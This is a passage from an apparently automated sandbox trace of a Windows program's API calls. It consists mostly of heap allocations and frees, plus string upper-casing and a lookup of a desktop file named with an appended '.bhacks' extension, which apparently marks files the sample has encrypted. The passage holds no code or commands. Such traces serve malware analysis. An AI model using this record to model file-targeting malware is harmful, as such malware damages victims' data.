Flags=0x0, Size=0x4) returned 0x2a71fe8 [0090.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0090.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0090.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0090.121] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0090.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0090.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0090.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0090.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0090.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0090.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0090.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0090.122] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0090.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0090.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0090.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0090.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0090.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0090.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0090.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0090.122] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0090.122] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0090.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0090.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0090.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0090.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0090.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0090.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0090.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0090.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0090.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0090.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0090.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0090.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0090.123] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0090.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0090.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0090.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0090.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0090.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0090.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0090.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0090.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0090.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0090.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0090.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0090.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0090.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0090.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0090.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0090.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0090.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0090.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0090.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0090.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0090.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0090.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0090.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0090.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0090.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0090.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0090.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0090.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0090.125] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0090.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0090.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0090.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0090.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0090.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0090.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0090.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0090.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0090.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0090.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0090.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0090.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0090.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.125] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0090.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0090.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0090.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0090.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0090.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0090.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0090.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0090.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0090.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0090.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0090.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0090.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0090.126] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/DqUNIlu.gif.bhacks", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23825ba3, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23825ba3, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23b46f90, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4b80, dwReserved0=0x0, dwReserved1=0x0, cFileName="DqUNIlu.gif.bhacks", cAlternateFileName="DQUNIL~1.BHA")) returned 0x9a4100 [0090.126] FindClose (in: hFindFile=0x9a4100 | out: hFindFile=0x9a4100) returned 1 [0090.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0090.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0090.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0090.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0090.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0090.126] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0090.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0090.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0090.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0090.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0090.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0090.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0090.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0090.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0090.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0090.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0090.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0090.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0090.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0090.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0090.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0090.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0090.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0090.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0090.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0090.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0090.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0090.128] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0090.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0090.128] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0090.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0090.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0090.128] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0090.129] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0090.129] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0090.129] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.129] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0090.129] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.129] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 